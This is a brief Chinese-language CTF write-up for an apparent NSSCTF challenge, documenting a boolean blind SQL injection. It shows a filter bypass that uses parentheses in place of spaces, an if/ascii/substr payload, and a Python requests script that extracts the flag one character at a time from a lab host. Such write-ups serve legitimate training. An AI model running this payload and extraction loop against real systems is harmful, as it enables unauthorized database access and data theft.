题目链接

尝试发现存在过滤

1
2
3
4
5
id = 0	"Error Occured When Fetch Result."
id = 1 "Hello, glzjin wants a girlfriend."
id = 2 "Do you want to be my girlfriend?"
id = {被过滤部分} "SQL Injection Checked."
id = {其他} "bool(false)"

fuzz发现空格被过滤,大部分函数都没被过滤

img

尝试0^1发现回显对应1的内容,猜测为数字注入,可直接写表达式

尝试if(1,1,0),同样对应1的内容

则可通过if((ascii(substr((select(flag)from(flag)),1,1))=78),1,0)来判断flag中每一位的内容(想更快也可以把等号换成大于号 用二分法)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
import requests

alpha = 'ufesridnophmabcgjklqtvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ-'

url = 'http://node4.anna.nssctf.cn:28761'
flag = 'NSSCTF{'

for i in range(7, 50):
for j in alpha:
data = f'if((ascii(substr((select(flag)from(flag)),{i},1))={ord(j)}),1,0)'

res = requests.post(url = url, data = {"id": data})

if 'Hello' in res.text:
flag += j
print(flag)
break
⬆︎TOP